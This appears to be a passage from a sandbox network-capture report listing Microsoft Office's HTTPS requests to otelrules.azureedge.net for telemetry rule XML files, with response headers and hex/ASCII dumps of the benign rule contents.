                                          x-azure-ref: 20241118T224450Z-1866b5c5fbblmqrkhC1DFWf9ns00000004g000000000vgyg
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:50 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          48192.168.2.45732513.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:50 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:50 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:50 GMT
                                          Content-Type: text/xml
                                          Content-Length: 404
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                          ETag: "0x8DC582B9E8EE0F3"
                                          x-ms-request-id: 2f467f27-f01e-003f-23a6-37d19d000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224450Z-164f84587bfsgfx9hC1DFWw1as00000006a000000000kcxq
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:50 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          49192.168.2.45732613.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:50 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:50 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:50 GMT
                                          Content-Type: text/xml
                                          Content-Length: 468
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                          ETag: "0x8DC582B9C8E04C8"
                                          x-ms-request-id: 0e86b0ea-b01e-0097-3ed2-374f33000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224450Z-16547b76f7ftnm6xhC1DFW9c8c00000006400000000045wd
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:50 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          50192.168.2.45732713.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:50 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:50 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:50 GMT
                                          Content-Type: text/xml
                                          Content-Length: 428
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                          ETag: "0x8DC582BAC4F34CA"
                                          x-ms-request-id: d36f9ca3-a01e-0021-21af-36814c000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224450Z-16547b76f7fz92z5hC1DFWmdx800000004t0000000007rke
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:50 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          51192.168.2.45733013.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:50 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:51 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:51 GMT
                                          Content-Type: text/xml
                                          Content-Length: 415
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                          ETag: "0x8DC582B988EBD12"
                                          x-ms-request-id: 584cc2e3-301e-005d-1eab-36e448000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224451Z-1866b5c5fbbg9tvxhC1DFWy9mg000000027g00000000r8u4
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:51 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          52192.168.2.45733113.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:50 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:51 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:51 GMT
                                          Content-Type: text/xml
                                          Content-Length: 471
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                          ETag: "0x8DC582BB5815C4C"
                                          x-ms-request-id: fa408a18-501e-0064-15b8-371f54000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224451Z-16547b76f7fbkfmzhC1DFWm9tw00000005y0000000011xqw
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:51 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          53192.168.2.45732913.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:50 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:51 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:51 GMT
                                          Content-Type: text/xml
                                          Content-Length: 499
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                          ETag: "0x8DC582B98CEC9F6"
                                          x-ms-request-id: 2e817dff-001e-0065-4df1-390b73000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224451Z-r18f44ddb69xvwv5hC1DFWstpn00000000pg000000000hxq
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          X-Cache-Info: L1_T2
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:51 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          54192.168.2.45733213.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:50 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:51 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:51 GMT
                                          Content-Type: text/xml
                                          Content-Length: 419
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                          ETag: "0x8DC582BB32BB5CB"
                                          x-ms-request-id: 913984e0-001e-0017-7a9b-380c3c000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224451Z-16547b76f7ff9zf4hC1DFW2pfc000000041g00000000btzv
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:51 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          55192.168.2.45733313.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:51 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:51 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:51 GMT
                                          Content-Type: text/xml
                                          Content-Length: 494
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                          ETag: "0x8DC582BB8972972"
                                          x-ms-request-id: a0c6f192-101e-007a-2f09-37047e000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224451Z-16547b76f7fpdsp9hC1DFW8f50000000041000000000dqq5
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:51 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          56192.168.2.45733413.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:51 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:51 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:51 GMT
                                          Content-Type: text/xml
                                          Content-Length: 420
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                          ETag: "0x8DC582B9DAE3EC0"
                                          x-ms-request-id: 9666febd-501e-0035-5391-38c923000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224451Z-r18f44ddb69vpnwdhC1DFWa89n00000000h0000000000894
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          X-Cache-Info: L1_T2
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:51 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          57192.168.2.45733513.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:51 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:51 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:51 GMT
                                          Content-Type: text/xml
                                          Content-Length: 472
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                          ETag: "0x8DC582B9D43097E"
                                          x-ms-request-id: dd4d8867-801e-0083-7a9b-38f0ae000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224451Z-16547b76f7fr5rfnhC1DFW0am40000000400000000002k3u
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:51 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          58192.168.2.45733613.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:51 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:51 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:51 GMT
                                          Content-Type: text/xml
                                          Content-Length: 427
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                          ETag: "0x8DC582BA909FA21"
                                          x-ms-request-id: 84a41f1b-401e-0029-37ca-399b43000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224451Z-r18f44ddb69xvwv5hC1DFWstpn00000000dg00000000akm3
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
